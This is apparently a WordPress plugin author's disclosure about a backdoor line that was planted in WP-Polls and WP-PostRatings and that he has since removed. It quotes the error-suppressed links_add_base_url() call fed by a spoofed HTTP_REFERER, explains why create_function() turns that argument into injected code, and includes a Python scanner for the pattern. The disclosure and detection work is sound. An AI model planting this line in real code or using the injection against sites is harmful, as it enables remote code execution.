I have released 2 security updates to WP-Polls and WP-PostRatings which basically remove malicious code that allows code injection.
The malicious code is as follows:
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
    return;
The code itself does nothing, but hackers are spoofing $_SERVER['HTTP_REFERER'], which allows arbitrary code injection. Note the @ sign, which suppresses all errors, so the error will not be displayed.
I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.
- Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to have placed it in my own plugin code.
- I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am in the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
- The above changeset is for trunk. However, in my readme.txt I have stated that the stable tag is 1.50, and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit; it is almost 9am in my timezone, I would be in my office, and my office's computer does not have SVN copies of my plugin. So it is also not possible for me to have committed that file.
- If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do an SVN copy for my plugins; normally I just copy and paste the files using Windows Explorer.
- For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. In my timezone it is about 8.30pm and it is not possible for me to check in because 8pm to 9pm is my dinner time and I always eat out.
- For WP-WAP, there are also 2 suspicious commits, here and here. As I do not develop WP-WAP anymore, there is no reason for me to commit anything to it.
I am going to review all my commits to the SVN to ensure that there is no more suspicious code being added.
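As an added defender-side example (not code from this post, from the plugins or from WordPress): a small triage scanner for the backdoor shape described above, i.e. request-controlled data such as $_SERVER['HTTP_REFERER'] reaching links_add_base_url(), create_function() or eval(), reporting whether the call was wrapped in the error-suppressing @. The sample plugin source it scans is constructed for the example.

```python
import re

# Eval-style sinks. In WordPress 2.7, links_add_base_url() splices its $base
# argument into the source string handed to create_function(), which is eval'd,
# so it is treated here as an eval sink alongside the other two.
SINKS = ("links_add_base_url", "create_function", "eval")
SUPERGLOBAL = r"\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]"
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?!=)\s*" + SUPERGLOBAL)
CALL_RE = re.compile(r"(@?)\b(" + "|".join(SINKS) + r")\s*\(([^;]*)\)")


def find_eval_sinks_fed_by_requests(php_source):
    """Return (line_no, sink, error_suppressed) for each call to a sink whose
    arguments contain a request superglobal, or a variable that was assigned
    from one earlier in the file. Regex based: one assignment hop and no
    control flow, so this is a triage check for the backdoor shape, not a
    full taint analysis."""
    tainted = set()
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        for m in ASSIGN_RE.finditer(line):
            tainted.add(m.group(1))
        for m in CALL_RE.finditer(line):
            args = m.group(3)
            direct = re.search(SUPERGLOBAL, args) is not None
            via_var = any(re.search(re.escape(v) + r"\b", args) for v in tainted)
            if direct or via_var:
                findings.append((line_no, m.group(2), m.group(1) == "@"))
    return findings


# Constructed sample, not a real plugin file: the backdoor line quoted in the
# post, a one-hop variant, and two benign calls that must not be flagged.
SAMPLE_PLUGIN = r"""<?php
// constructed sample plugin source
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
    return;
$ref = $_SERVER['HTTP_REFERER'];
$out = links_add_base_url($content, $ref);
echo links_add_base_url($content, home_url());
$cb = create_function('$m', 'return strtoupper($m[0]);');
"""

if __name__ == "__main__":
    for line_no, sink, suppressed in find_eval_sinks_fed_by_requests(SAMPLE_PLUGIN):
        flag = " (errors suppressed with @)" if suppressed else ""
        print(f"line {line_no}: request data reaches {sink}(){flag}")
```

Point it at each plugin directory of an install and review every hit by hand; the regexes are deliberately broad and will not follow data across functions or files.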
/**
 * Add a Base url to relative links in passed content.
 *
 * By default it supports the 'src' and 'href' attributes. However this can be
 * changed via the 3rd param.
 *
 * @since 2.7.0
 *
 * @param string $content String to search for links in.
 * @param string $base The base URL to prefix to links.
 * @param array $attrs The attributes which should be processed.
 * @return string The processed content.
 */
function links_add_base_url( $content, $base, $attrs = array('src', 'href') ) {
    $attrs = implode('|', (array)$attrs);
    // $base is concatenated unescaped into the PHP source string that
    // create_function() compiles, so whatever is passed as $base becomes code.
    return preg_replace_callback("!($attrs)=(['\"])(.+?)\\2!i",
        create_function('$m', 'return _links_add_base($m, "' . $base . '");'),
        $content);
}
Yeap, I checked that out after that, but I have no use for it.
So how does the exploit work?